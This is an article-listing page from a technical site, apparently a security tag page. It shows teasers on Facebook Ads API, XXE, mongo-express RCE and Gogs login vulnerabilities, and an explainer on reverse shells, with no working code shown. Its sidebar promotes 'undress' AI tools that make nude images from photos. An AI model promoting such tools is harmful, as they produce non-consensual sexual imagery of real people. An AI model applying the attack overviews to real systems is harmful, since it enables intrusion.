Community
Learn
Tools Library
AI Tools
Leisure
search
English
Article Tags
Home Technical Articles Operation and Maintenance Safety
How to analyze the source code leak vulnerability of Facebook Ads advertising business API interface

How to analyze the source code leak vulnerability of Facebook Ads advertising business API interface

More than a month after discovering the vulnerability, I discovered a vulnerability in the API of the FacebookAds advertising business system. The vulnerable API is an image processing interface, which is used for Facebook merchant accounts to upload advertising images. The uploaded images will be stored in a directory called "/adimages" and encoded in base64 format. Therefore, my test idea is that in the mechanism here, a malicious payload can be injected into the uploaded image, which will be converted into Base64 format by the API and then passed to the server by Facebook. The following is the POST request to upload images: POST/v2.10/act_123456789/adimagesHTT

May 11, 2023 pm 05:40 PM
API Facebook ads
Example analysis of XML external entity injection vulnerability

Example analysis of XML external entity injection vulnerability

1. XML external entity injection XML external entity injection vulnerability is what we often call XXE vulnerability. XML is a widely used data transmission format, and many applications contain code for processing XML data. By default, many outdated or improperly configured XML processors will reference external entities. If an attacker can upload an XML document or add malicious content to the XML document, through vulnerable code, dependencies, or integrations, he or she can attack a flawed XML processor. The occurrence of XXE vulnerabilities has nothing to do with the development language. As long as the xml data is parsed in the application and the data is controlled by the user, the application may be vulnerable to XXE attacks. This article uses java

May 11, 2023 pm 04:55 PM
xml
Remote code execution vulnerability case analysis

Remote code execution vulnerability case analysis

0x01 Get to know mongo-expressmongo-express is a MongoDB AdminWeb management interface, written using NodeJS, Express, and Bootstrap3. Currently, mongo-express should be the MongoDBadmin management interface with the most stars on Github. Easy to deploy and simple to use, it has become the choice of many people to manage mongo. 0x02 Set up the debugging environment 0x1 Start the docker service After reading the official GitHub security bulletin, we found that the vulnerability affects all versions below 0.54.0. We chose to use 0.49 as an example for testing. Due to this vulnerability environment, M

May 11, 2023 pm 04:46 PM
mongo-express
Gogs arbitrary user login vulnerability instance analysis

Gogs arbitrary user login vulnerability instance analysis

1. Vulnerability background Gogs is an open source file/code management system (based on Git) similar to GitHub. The goal of Gogs is to create the simplest, fastest and easiest way to build self-service Git services. Developed using the Go language, Gogs can be distributed through independent binaries and supports all platforms supported by the Go language, including Linux, MacOSX, Windows and ARM platforms. 2. Vulnerability description gogs is a self-service Git service platform that is easy to build. It has the characteristics of easy installation, cross-platform, and lightweight, and has many users. In its 0.11.66 and previous versions, (go-macaron/session library) does not perform sessionid

May 11, 2023 pm 04:43 PM
gogs
What does rebound shell mean?

What does rebound shell mean?

*Stern statement: This article is limited to technical discussion and sharing, and is strictly prohibited from being used in illegal ways. 0x00 Preface Rebound shell means that the control terminal monitors a certain TCP/UDP port, the controlled terminal initiates a request to the port, and transfers the input and output of its command line to the control terminal. In layman's terms, rebound shell is a kind of reverse link, which is different from forward ssh. It is an attack mode in which the other party's computer executes a command to connect to our side, and this attack mode must be used with a remote command execution vulnerability. Why rebound shell? It is usually used when the controlled end is restricted by firewall, lacks permissions, and the port is occupied. Suppose we attack a machine and open a port on the machine. The attacker connects to the target machine on his own machine. This

May 11, 2023 pm 04:25 PM
shell
Real experience sharing: Information security engineer of 'Du Xiaoman'

Real experience sharing: Information security engineer of 'Du Xiaoman'

This article will share with you what questions I was asked when I was interviewing Du Xiaoman Information Security Engineer (Financial Security Department). I went through one, two, and three interviews in total. Let’s take a look at it together. I hope it will help those in need. Friends can help~

Jan 12, 2023 pm 02:28 PM
安全工程师
Let's see how to learn network protocols through the QUIC protocol

Let's see how to learn network protocols through the QUIC protocol

This article will take you to understand the QUIC protocol, and use the QUIC protocol as an example to talk about how to learn network protocols. I hope it will be helpful to everyone!

Mar 01, 2022 am 09:57 AM
QUIC 协议 网络协议
session consistency design

session consistency design

What is session consistency? Web-server can automatically create sessions for users accessing the same browser and provide storage functions. Generally, user login information is stored in the session. What is the session consistency problem? When there is only one web-server in the backend, the correct session can be found for every http request. The problem is that it cannot meet high availability. If one server hangs up, it will be over. Redundancy + failover, deploy multiple web-servers, nginx path...

Jun 25, 2021 pm 06:09 PM
1
Introducing several commonly used web security authentication methods

Introducing several commonly used web security authentication methods

This article introduces five commonly used web security authentication methods, which has certain reference value. I hope it can be helpful to everyone.

Mar 15, 2021 am 10:40 AM
web 安全认证
How to keep the web safe

How to keep the web safe

In the early days of the development of the Internet, it was still the era of the IE browser. At that time, the purpose of everyone surfing the Internet was to share information and obtain news through the browser. With the rapid development of the Internet, web pages can do more and more things. You can not only read news and play games, but also shop and chat. These functions have greatly enriched our lives.

Mar 09, 2021 am 09:51 AM
web 安全
Share solutions to several common web security risks

Share solutions to several common web security risks

Web server security: This article shares solutions to several common web security risks. It has certain reference value and I hope it can be helpful to everyone.

Mar 01, 2021 am 10:44 AM
web安全隐患 解决方法
Discuss the loopholes of a group buying website

Discuss the loopholes of a group buying website

Website security: This article shares with you some of my discussions on the vulnerabilities of a certain group buying website, I hope it can help you.

Feb 20, 2021 am 10:58 AM
团购网 漏洞
Windows server security settings summary

Windows server security settings summary

Windows Server is the core of Microsoft Windows Server System (WSS), the server operating system for Windows.

Feb 02, 2021 am 11:50 AM
windows 服务器 安全
Is your product key really secure?

Is your product key really secure?

Maybe because we use Windows systems every day, we have the illusion that our product keys are very safe. Even the network administrators of some companies have not considered whether product keys are secure.

Jan 28, 2021 am 10:40 AM
产品密钥

Hot tools Tags

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055523 fails to install in Windows 11?
3 weeks ago By DDD
How to fix KB5055518 fails to install in Windows 10?
3 weeks ago By DDD
Strength Levels for Every Enemy & Monster in R.E.P.O.
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Blue Prince: How To Get To The Basement
3 weeks ago By DDD
Roblox: Dead Rails - How To Tame Wolves
3 weeks ago By DDD
Show More

Hot Tools

vc9-vc14 (32+64 bit) runtime library collection (link below)

vc9-vc14 (32+64 bit) runtime library collection (link below)

Download the collection of runtime libraries required for phpStudy installation

VC9 32-bit

VC9 32-bit

VC9 32-bit phpstudy integrated installation environment runtime library

PHP programmer toolbox full version

PHP programmer toolbox full version

Programmer Toolbox v1.0 PHP Integrated Environment

VC11 32-bit

VC11 32-bit

VC11 32-bit phpstudy integrated installation environment runtime library

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Show More

Hot Topics

Java Tutorial
1653
14
CakePHP Tutorial
1413
52
Laravel Tutorial
1304
25
PHP Tutorial
1251
29
C# Tutorial
1224
24
Show More